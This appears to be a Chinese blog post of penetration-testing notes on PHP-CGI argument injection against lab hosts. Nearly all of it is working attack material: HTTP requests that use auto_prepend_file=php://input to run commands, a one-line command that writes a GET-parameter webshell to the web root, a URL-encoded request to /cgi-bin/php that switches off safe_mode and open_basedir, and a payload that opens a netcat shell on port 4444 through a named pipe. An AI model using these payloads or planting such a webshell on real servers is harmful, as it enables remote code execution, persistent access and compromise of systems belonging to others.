php文件包含

无文件,本地文件包含漏洞

POST http://192.168.2.66/phpMyAdmin/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1
Host:192.168.2.66
Content-Length: 34
 
<?php
passthru('id');
die();
?>

写入简易webshell

echo "<?php \$cmd=\$_GET["cmd"]; system(\$cmd);?>" > /var/www/3.php

kali中自带反弹webshell

 

为什么不能执行ifconfig命令

此获得的账号没有某些环境变量的权限

使用

whereis ifconfig

查看ifconfig存在哪个目录

使用绝对路径执行

/sbin/ifconfig

即可

进过url编码的php漏洞利用,使用cgi-bin默认配置

POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1
Host: 192.168.20.5
Content-Length: 42

<?php
 system('mkfifo /tmp/pipe;sh /tmp/pipe | nc -nlp 4444 > /tmp/pipe');
?>

 

posted on   叶子在行动  阅读(28)  评论(0编辑  收藏  举报

相关博文:
·  php文件包含漏洞利用原理
·  mysql基于布尔的盲注,使用python脚本爆破
·  渗透测试之本地文件包含(LFI)
·  文件包含漏洞
·  WEB漏洞—文件操作之文件包含漏洞
阅读排行:
· TypeScript + Deepseek 打造卜卦网站:技术与玄学的结合
· Manus的开源复刻OpenManus初探
· AI 智能体引爆开源社区「GitHub 热点速览」
· 三行代码完成国际化适配,妙~啊~
· .NET Core 中如何实现缓存的预热?
< 2025年3月 >
23 24 25 26 27 28 1
2 3 4 5 6 7 8
9 10 11 12 13 14 15
16 17 18 19 20 21 22
23 24 25 26 27 28 29
30 31 1 2 3 4 5

导航

统计

点击右上角即可分享
微信分享提示
SQL AI 助手